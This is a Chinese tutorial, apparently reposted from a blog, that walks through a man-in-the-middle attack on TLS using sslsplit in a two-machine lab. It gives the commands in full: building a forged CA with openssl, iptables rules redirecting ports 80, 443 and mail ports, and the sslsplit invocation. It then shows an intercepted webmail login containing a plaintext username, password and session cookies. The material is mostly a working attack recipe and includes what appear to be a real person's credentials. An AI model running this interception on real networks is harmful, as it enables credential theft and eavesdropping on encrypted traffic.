中间人攻击,即在中间监听获取网络数据以便获取的有价值的信息实现攻击破坏的目的,即client-mid man-server,此处介绍的sslsplit可以作为mid man监听ssl信息及HTTP信息。http不做介绍仅仅实现代理功能,ssl实现代理的同时要与服务器建立连接,同时伪造证书与客户端建立连接,即双连接,依据获取的client信息再与服务器通信,从而实现明文数据监听。
1、实验环境 2台机器配置如下:
A:192.168.68.62
A机器为Linux系统
B:192.168.68.66
B机器为Linux系统(Windows系统也可),将B机器网关设置为192.168.68.62即由B发出的报文都转向A机器
2、A机器SSLSplit配置过程
安装libevent2.x:下载地址http://download.chinaunix.net/download/0006000/5804.shtml下载最新版本安装即可(此实验环境下载的是libevent-2.0.21-stable.tar.gz)
安装Openssl:下载地址http://www.openssl.org/source/ (此实验环境下载的是openssl-1.0.1g.tar.gz (MD5) (SHA1) (PGP sign))
安装sslsplit:https://github.com/droe/sslsplit 点击右侧下载zip包即可。
下载后解压安装 依次执行tar zxvf xx.tar.gz ; cd xx ; ./configure ; make ; make install
在不指定prefix=XX的情况下,默认安装到/usr/local/目录对于动态库安装后需要修改/etc/ld.so.conf加上.so所在目录 目前安装后为/usr/local/lib目录,把/usr/local/lib加入到ld.so.conf文件中后执行ldconfig将动态库信息加入缓存中以便相关程序查找使用。
安装完毕后可执行openssl及sslslplit -h查看openssl是否安装成功。
3、制作证书:
利用openssl制作ca以便为后续的客户端程序颁发伪造的证书,同时去除key的密码认证。
openssl req -new x509 -keyout ca.key -out ca.crt
openssl rsa -in ca.key -out ca.key.unsecure
4、执行sslsplit代理
将下面的信息加入到sslsplit.sh脚本中,后续启动直接执行sslsplit脚本即可。
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -F
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 5222 -j REDIRECT --to-ports 8080
sslsplit -D -l connections.log -j /tmp/sslsplit/ -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
如果发现端口被占用提示Error from bind() ip地址被占用时使用netstat -tanlp命令查看哪些端口被哪些进程占用,杀掉进程响应进程即可。
5、在测试机器B中访问mail.xx.com.cn时,可以在日志/tmp/sslsplit/logdir中查看ssl中加密的明文信息如下,红色字体为用户名密码,实现中间人查看。
POST / HTTP/1.1
Host: mail.topsec.com.cn
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.11) Gecko/20121116 Firefox/10.0.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: https://mail.XX.com.cn/
Cookie: roundcube_sessid=gbpd6svfmue2s7695c37mu7n77; isbdresult=userclass%3A8%2Cuserdomain%3DNULL%2Cissystemadmin%3D0%2Cend
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
_token=d9646e13b414e4e3108d64e919855921&_action=login&_timezone=-7&_url=&_user=jia_yanhui&_pass=123456789%21&CAPTCHA_word=garnet&domain=-&select=&_lang_sel=zh_CNHTTP/1.1 302 Found
Date: Mon, 16 Jun 2014 06:08:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sessauth=-del-; expires=Mon, 16-Jun-2014 06:07:24 GMT; path=/; secure; httponly
Set-Cookie: roundcube_sessid=3d14227ff09dac79b950acfb2c4b78c1; path=/; secure; httponly
Location: ./?_task=login
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 25
Connection: close
Content-Type: text/html
6、sslsplit控制台输出如下内容:
===> Original server certificate: //这个为服务器的真正证书信息
Subject DN: /C=AU/ST=Some- State/O=xC3xA5xC2x8CxC2x97xC3xA4xC2xBAxC2xACxC3xA5xC2xA4xC2xA9xC3xA8xC2x9ExC2x8DxC3xA4xC2xBFxC2xA1xC3xA7xC2xA7xC2x91xC3xA6xC2x8AxC2x80xC3xA6xC2x9CxC2x89xC3xA9xC2x99xC2x90xC3xA5xC2x85xC2xACxC3xA5xC2x8FxC2xB8/CN=mail1./emailAddress=postmaster@
Common Names: mail1.
Fingerprint: 45:5c:93:02:f4:3c:90:62:1c:80:11:82:8e:01:88:67:20:29:3b:73
Certificate cache: HIT
===> Forged server certificate: //这个为伪造的返回给客户端的证书信息
Subject DN: /C=AU/ST=Some- State/O=xC3xA5xC2x8CxC2x97xC3xA4xC2xBAxC2xACxC3xA5xC2xA4xC2xA9xC3xA8xC2x9ExC2x8DxC3xA4xC2xBFxC2xA1xC3xA7xC2xA7xC2x91xC3xA6xC2x8AxC2x80xC3 xA6xC2x9CxC2x89xC3xA9xC2x99xC2x90xC3xA5xC2x85xC2xACxC3xA5xC2x8FxC2xB8/CN=mail1./emailAddress=postmaster@
Common Names: mail1.
Fingerprint: 35:5c:cb:4c:eb:71:ae:d1:63:d3:54:c6:97:5a:3c:23:ea:fe:a3:ad
COPY FROM : https://blog.csdn.net/jiayanhui2877/article/details/31379439